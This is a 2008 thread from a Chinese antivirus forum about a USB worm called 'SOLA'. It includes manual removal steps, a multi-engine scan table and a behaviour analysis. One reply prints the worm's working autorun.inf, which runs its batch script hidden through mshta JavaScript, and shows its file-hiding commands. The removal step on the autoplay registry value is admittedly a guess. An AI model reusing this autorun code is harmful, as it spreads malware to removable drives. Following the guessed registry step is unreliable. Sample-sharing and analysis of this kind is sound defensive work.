收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 最新u盘病毒样本,过nod 红伞
1234下一页
返回列表 发新帖
查看: 6049|回复: 30
收起左侧

[病毒样本] 最新u盘病毒样本,过nod 红伞

[复制链接]
geforce
发表于 2008-4-14 12:03:37 | 显示全部楼层 |阅读模式
大家试试。
附件压缩包是病毒样本,请小心查看。病毒是10月1日发作!

别人拿来一个U盘,在我机器上使用,NOD32居然没有任何报警,结果发现U盘根目录里有隐藏的autorun.inf文件,检查其它盘符,都发现了这个文件,才意识到中病毒了。用NOD32反复检查也检查不出任何问题。

分析了一下autorun.inf,以及每个盘符隐藏的SOLA目录及里面的脚本,发现这只是一个自动执行,自我复制,通过U盘传播的windows脚本。清除还算比较容易,以下是具体操作。

1、重新启动进入安全模式

2、删除各个根目录(包括U盘)隐藏的autorun.inf和SOLA目录

3、删除以下文件(部分文件为隐藏文件)

    %systemroot%\Fonts\Regedit.reg
    %systemroot%\Fonts\sleep.exe
    %systemroot%\Fonts\SOLA.BAT
    %systemroot%\Fonts\est_type2032.fon
    %systemroot%\Tasks\Tasks.job

4、删除%systemroot%\Fonts\solasetup目录

5、更改注册表
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]
"Start"=dword:00000000
(00000004是自动播放,禁用自动播放我不知道是哪个值,估计应该是0。)

6、重启机器

再贴一个它的核心批处理代码:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Exia 该用户已被删除
发表于 2008-4-14 12:17:03 | 显示全部楼层
3817987  Autorun.inf  475 Byte  UNDER ANALYSIS
3817990  sleep.exe  1 KB  UNDER ANALYSIS
3817991  SOLA.BAT  11.54 KB  UNDER ANALYSIS
3817992  Tasks.xxx  318 Byte  UNDER ANALYSIS
回复

举报

aerbeisi
发表于 2008-4-14 12:25:33 | 显示全部楼层
软件名称引擎版本
病毒库版本
病毒库时间
扫描结果
时间
a-squared3.0.0.1262008.04.102008-04-10-
13.425
AntiVir7.6.0.857.0.3.1592008-04-13-
6.713
Arcavir1.0.42008041310392008-04-13-
3.914
AVAST1.0.8080414-02008-04-14-
3.206
AVG7.5.51.442269.22.13/13762008-04-13-
11.392
BitDefender7.60825.11423607.184512008-04-14-
14.052
CA (VET)9.0.0.14331.3.56922008-04-12-
40.854
ClamAV 0.9267512008-04-14-
0.013
Comodo2.112.0.0.4922008-04-11-
6.267
CP Secure1.1.0.7152008.04.142008-04-14-
15.153
Dr.WEB4.44.0.91702008.04.132008-04-13-
12.730
ewido4.0.0.22008.04.112008-04-11-
12.657
F-PROT4.4.1.52200804132008-04-13-
3.391
F-SECURE5.51.61002008.04.13.042008-04-13-
10.897
IKARUST3.1.01.262008.04.13.705972008-04-13-
7.276
Microsoft1.34082008.04.112008-04-11-
11.348
MKS_VIR2.012008.04.122008-04-12-
12.735
NORMAN5.91.105.902008-04-11BAT/AutoRun.AE
18.577
nProtect2008-04-11.0013745682008-04-11-
11.971
PrevxV2200804122008-04-12-
14.878
QuickHeal9.002008.04.122008-04-12Suspicious - DNAScan
2.777
SOPHOS2.72.04.282008-04-14-
8.077
The Hacker6.2.92v002732008-04-10-
1.796
VBA323.12.6.420080413.06212008-04-13-
4.565
ViRobot200804102008.04.102008-04-10-
1.244
VirusBuster4.3.19:99.123.40/11.02008-04-14-
4.603
卡巴斯基5.5.102008.04.142008-04-14-
24.432
安博士V32008.04.11.012008.04.112008-04-11-
13.966
江民杀毒10.00.6502008.04.132008-04-13-
3.098
熊猫卫士9.04.03.00012008.04.132008-04-13-
3.427
瑞星20.020.39.32.002008-04-10-
3.262
赛门铁克1.3.0.2420080413.0032008-04-13-
0.645
趋势8.500-10015.212.582008-04-13Possible_Otorun6
0.049
迈克菲5.2.0052722008-04-11-
7.555
金山毒霸2007.6.20.2492008.4.132008-04-13-
6.347
飞塔2.81-3.118.9512008-04-11Suspicious
5.352
回复

举报

ranguangning
头像被屏蔽
发表于 2008-4-14 12:25:47 | 显示全部楼层
【1】AUTORUN.INF文件内容:
SOLA_1.0
[autorun]
shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell=打开(&O)
shell\open=复制磁盘(&C)
shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"



【2】SOLA.BAT调用SLEEP.EXE
父级进程:
   路径: F:\Windows\System32\cmd.exe
   PID: 2300
   信息: Windows Command Processor (Microsoft Corporation)
子级进程:
   路径: F:\Users\ranguangning终极管理员帐户\Desktop\SOLA\sleep.exe
   命令行:sleep  300


【3】
父级进程:
   路径: F:\Windows\System32\cmd.exe
   PID: 2300
   信息: Windows Command Processor (Microsoft Corporation)
子级进程:
   路径: F:\Users\ranguangning终极管理员帐户\Desktop\SOLA\sleep.exe
   命令行:sleep  1000


【4】父级进程:
   路径: F:\Windows\System32\cmd.exe
   PID: 2300
   信息: Windows Command Processor (Microsoft Corporation)
子级进程:
   路径: F:\Windows\System32\findstr.exe
   信息: Find String (QGREP) Utility (Microsoft Corporation)
   命令行:findstr  /C:"SOLA_1.0" C:\Autorun.inf


【5】父级进程:
   路径: F:\Windows\System32\cmd.exe
   PID: 2300
   信息: Windows Command Processor (Microsoft Corporation)
子级进程:
   路径: F:\Windows\System32\attrib.exe
   信息: Attribute Utility (Microsoft Corporation)
   命令行:attrib  -s -h -r C:\Autorun.inf



【6】父级进程:
   路径: F:\Windows\System32\cmd.exe
   PID: 2300
   信息: Windows Command Processor (Microsoft Corporation)
子级进程:
   路径: F:\Windows\System32\attrib.exe
   信息: Attribute Utility (Microsoft Corporation)
   命令行:attrib  C:\Autorun.inf +s +h +r


【7】父级进程:
   路径: F:\Windows\System32\cmd.exe
   PID: 2300
   信息: Windows Command Processor (Microsoft Corporation)
子级进程:
   路径: F:\Windows\System32\findstr.exe
   信息: Find String (QGREP) Utility (Microsoft Corporation)
   命令行:findstr  . D:\solachk1



【8】TASKS.XXX文件内容:
 x继褯榹K?&q簯@UF     <
     

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

流清泉
头像被屏蔽
发表于 2008-4-14 12:29:54 | 显示全部楼层
U盘病毒这么流行啊
回复

举报

挪威的冬天
发表于 2008-4-14 12:38:30 | 显示全部楼层
金山 0
回复

举报

zjsxsycj
发表于 2008-4-14 12:56:39 | 显示全部楼层
密码是什么?
回复

举报

scottxzt
发表于 2008-4-14 13:02:43 | 显示全部楼层
都是加密的文件,如何查!!!
回复

举报

aribeth199
发表于 2008-4-14 13:05:57 | 显示全部楼层
密码保护?
回复

举报

hellobaby
发表于 2008-4-14 13:32:48 | 显示全部楼层
巡警不报
回复

举报

下一页 »
1234下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-5 21:14 , Processed in 0.119689 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表